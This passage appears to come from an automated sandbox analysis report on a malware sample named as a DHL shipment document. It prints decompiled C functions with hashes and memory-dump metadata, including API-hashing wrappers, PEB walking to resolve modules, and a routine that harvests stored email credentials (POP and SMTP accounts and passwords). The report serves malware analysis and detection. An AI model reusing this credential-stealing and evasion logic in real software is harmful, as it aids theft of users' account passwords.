				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                    0x00403fac
                    0x00403fba
                    0x00403fbe

                    APIs
                    • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
                    • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                    • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                    0x0040647f
                    0x00406487
                    0x0040648a

                    APIs
                    • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                    • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}





                    0x004058f8
                    0x00405903
                    0x00405906

                    APIs
                    • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                    • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                    0x00405932
                    0x0040593d
                    0x00405940

                    APIs
                    • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                    • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0040438F
                    • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                    • VariantInit.OLEAUT32(?), ref: 004043C4
                    • SysAllocString.OLEAUT32(?), ref: 004043CD
                    • VariantInit.OLEAUT32(?), ref: 00404414
                    • SysAllocString.OLEAUT32(?), ref: 00404419
                    • VariantInit.OLEAUT32(?), ref: 00404431
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: InitVariant$AllocString$CreateInitializeInstance
                    • String ID:
                    • API String ID: 1312198159-0
                    • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                    • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                    0x0040d070
                    0x0040d080
                    0x0040d084
                    0x0040d086
                    0x0040d08c
                    0x0040d0a0
                    0x0040d0ae
                    0x0040d0bd
                    0x0040d0c0
                    0x0040d0c5
                    0x0040d0c9
                    0x0040d0e3
                    0x0040d0f2
                    0x0040d101
                    0x0040d104
                    0x0040d109
                    0x0040d110
                    0x0040d11e
                    0x0040d123
                    0x0040d126
                    0x0040d12d
                    0x0040d145
                    0x0040d154
                    0x0040d15a
                    0x0040d166
                    0x0040d174
                    0x0040d186
                    0x0040d18e
                    0x0040d19a
                    0x0040d1ac
                    0x0040d1ba
                    0x0040d1cc
                    0x0040d1d1
                    0x0040d1dd
                    0x0040d1e2
                    0x0040d1e7
                    0x0040d1e7
                    0x0040d1e7
                    0x0040d1eb
                    0x0040d1f1
                    0x0040d1f7
                    0x0040d1ff
                    0x0040d207
                    0x0040d20f
                    0x0040d217
                    0x0040d21f
                    0x0040d227
                    0x0040d230

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                    • API String ID: 0-2111798378
                    • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                    • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040549C Relevance: .1, Instructions: 146COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040549C(signed int _a4, signed int* _a8) {
				signed int* _t46;
				void* _t47;
				signed int* _t48;
				signed int* _t49;
				signed int* _t50;
				signed int* _t51;
				signed int* _t52;
				signed int* _t53;
				signed int* _t55;
				signed int* _t57;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				unsigned int _t64;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t102;
				signed char* _t124;

				_t124 = _a4;
				_t59 =  *_t124 & 0x000000ff;
				if(_t59 >= 0) {
					_t57 = _a8;
					_t57[1] = _t57[1] & 0x00000000;
					 *_t57 = _t59;
					return 1;
				}
				_t95 = _t124[1] & 0x000000ff;
				if(_t95 >= 0) {
					_t55 = _a8;
					_t55[1] = _t55[1] & 0x00000000;
					 *_t55 = (_t59 & 0x0000007f) << 0x00000007 | _t95;
					return 2;
				}
				_t61 = _t59 << 0x0000000e | _t124[2] & 0x000000ff;
				if(_t61 < 0) {
					_t97 = _t95 << 0x0000000e | _t124[3] & 0x000000ff;
					_t62 = _t61 & 0x001fc07f;
					if(_t97 < 0) {
						_t98 = _t97 & 0x001fc07f;
						_t77 = _t62 << 0x0000000e | _t124[4] & 0x000000ff;
						if(_t77 < 0) {
							_t64 = _t62 << 0x00000007 | _t98;
							_t100 = _t98 << 0x0000000e | _t124[5] & 0x000000ff;
							if(_t100 < 0) {
								_t79 = _t77 << 0x0000000e | _t124[6] & 0x000000ff;
								if(_t79 < 0) {
									_t102 = _t100 << 0x0000000e | _t124[7] & 0x000000ff;
									_t81 = (_t79 & 0x001fc07f) << 7;
									if(_t102 < 0) {
										_t46 = _a8;
										 *_t46 = (_t102 & 0x001fc07f | _t81) << 0x00000008 | _t124[8] & 0x000000ff;
										_t46[1] = (_t124[4] & 0x000000ff) >> 0x00000003 & 0x0000000f | _t64 << 0x00000004;
										_t47 = 9;
									} else {
										_t48 = _a8;
										 *_t48 = _t102 & 0xf01fc07f | _t81;
										_t48[1] = _t64 >> 4;
										_t47 = 8;
									}
								} else {
									_t49 = _a8;
									 *_t49 = (_t100 << 0x00000007 ^ _t79) & 0x0fe03f80 ^ _t79;
									_t49[1] = _t64 >> 0xb;
									_t47 = 7;
								}
							} else {
								_t50 = _a8;
								_a4 = (_t77 & 0x001fc07f) << 0x00000007 | _t100;
								 *_t50 = _a4;
								_t50[1] = _t64 >> 0x12;
								_t47 = 6;
							}
						} else {
							_t51 = _a8;
							 *_t51 = _t98 << 0x00000007 | _t77;
							_t51[1] = _t62 >> 0x12;
							_t47 = 5;
						}
					} else {
						_t52 = _a8;
						_t52[1] = _t52[1] & 0x00000000;
						 *_t52 = _t97 & 0x001fc07f | _t62 << 0x00000007;
						_t47 = 4;
					}
					return _t47;
				} else {
					_t53 = _a8;
					_t53[1] = _t53[1] & 0x00000000;
					 *_t53 = (_t95 & 0x0000007f) << 0x00000007 | _t61 & 0x001fc07f;
					return 3;
				}
			}


























                    0x004054a1
                    0x004054a4
                    0x004054a9
                    0x004054ab
                    0x004054ae
                    0x004054b2
                    0x00000000
                    0x004054b4
                    0x004054bb
                    0x004054c1
                    0x004054c3
                    0x004054ce
                    0x004054d2
                    0x00000000
                    0x004054d4
                    0x004054e2
                    0x004054e6
                    0x00405513
                    0x00405515
                    0x00405519
                    0x0040553b
                    0x0040553d
                    0x00405541
                    0x00405565
                    0x0040556a
                    0x0040556e
                    0x0040559a
                    0x0040559e
                    0x004055c9
                    0x004055cb
                    0x004055d0
                    0x0040560d
                    0x00405610
                    0x00405612
                    0x00405615
                    0x004055d2
                    0x004055d2
                    0x004055e4
                    0x004055e6
                    0x004055e9
                    0x004055e9
                    0x004055a0
                    0x004055a0
                    0x004055b7
                    0x004055b9
                    0x004055bc
                    0x004055bc
                    0x00405570
                    0x00405570
                    0x0040557d
                    0x00405587
                    0x00405589
                    0x0040558c
                    0x0040558c
                    0x00405543
                    0x00405543
                    0x00405552
                    0x00405554
                    0x00405557
                    0x00405557
                    0x0040551b
                    0x0040551b
                    0x00405525
                    0x00405529
                    0x0040552b
                    0x0040552b
                    0x00000000
                    0x004054e8
                    0x004054e8
                    0x004054f9
                    0x004054fd
                    0x00000000
                    0x004054ff

                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                    • Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
                    • Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                    • Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004029D4 Relevance: .1, Instructions: 77COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E004029D4(signed int _a28, signed int _a36, unsigned int _a40) {
				signed int _t26;
				signed int _t27;
				signed int _t28;
				signed int _t39;
				signed int _t47;
				unsigned int _t69;
				unsigned int _t70;
				signed int _t71;
				signed int _t73;
				signed int _t75;
				signed int* _t76;

				asm("pushad");
				_t75 = _a36;
				_t69 = _a40;
				_t26 = 0;
				if(_t75 != 0) {
					_t27 = 0xffffffffffffffff;
					if(_t69 != 0) {
						while((_t75 & 0x00000003) != 0) {
							_t47 = _t27 ^  *_t75;
							_t75 = _t75 + 1;
							_t27 = _t47 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t47) * 4);
							_t69 = _t69 - 1;
							if(_t69 != 0) {
								continue;
							}
							break;
						}
						_t73 = _t69 & 0x00000007;
						_t70 = _t69 >> 3;
						while(_t70 != 0) {
							_t76 = _t75 + 4;
							_t39 = ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4))) * 4) ^  *_t76;
							_t75 =  &(_t76[1]);
							_t27 = (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4))) * 4);
							_t70 = _t70 - 1;
						}
						_t71 = _t73;
						if(_t71 != 0) {
							do {
								_t28 = _t27 ^  *_t75;
								_t75 = _t75 + 1;
								_t27 = _t28 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t28) * 4);
								_t71 = _t71 - 1;
							} while (_t71 != 0);
						}
					}
					_t26 =  !_t27;
				}
				_a28 = _t26;
				asm("popad");
				return _t26;
			}














                    0x004029d4
                    0x004029d5
                    0x004029d9
                    0x004029e2
                    0x004029e6
                    0x004029ec
                    0x004029f1
                    0x004029f7
                    0x004029ff
                    0x00402a01
                    0x00402a0c
                    0x00402a0f
                    0x00402a10
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402a10
                    0x00402a14
                    0x00402a17
                    0x00402a1a
                    0x00402a1e
                    0x00402a55
                    0x00402a57
                    0x00402a8b
                    0x00402a8e
                    0x00402a8e
                    0x00402a91
                    0x00402a95
                    0x00402a97
                    0x00402a97
                    0x00402a99
                    0x00402aa4
                    0x00402aa7
                    0x00402aa7
                    0x00402a97
                    0x00402a95
                    0x00402aaa
                    0x00402aaa
                    0x00402aac
                    0x00402ab0
                    0x00402ab1

                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                    • Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
                    • Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                    • Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040317B Relevance: .0, Instructions: 46COMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}














                    0x0040317f
                    0x00403180
                    0x00403180
                    0x00403180
                    0x0040318d
                    0x00403196
                    0x00403199
                    0x0040319b
                    0x004031a1
                    0x004031a9
                    0x004031ab
                    0x004031ac
                    0x004031ae
                    0x00000000
                    0x004031b0
                    0x004031b3
                    0x004031c2
                    0x004031c7
                    0x004031cd
                    0x004031e0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004031cd
                    0x004031d7
                    0x004031dd
                    0x004031cf
                    0x004031cf
                    0x004031d1
                    0x004031d5
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                    • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                    Uniqueness

                    Uniqueness Score: -1.00%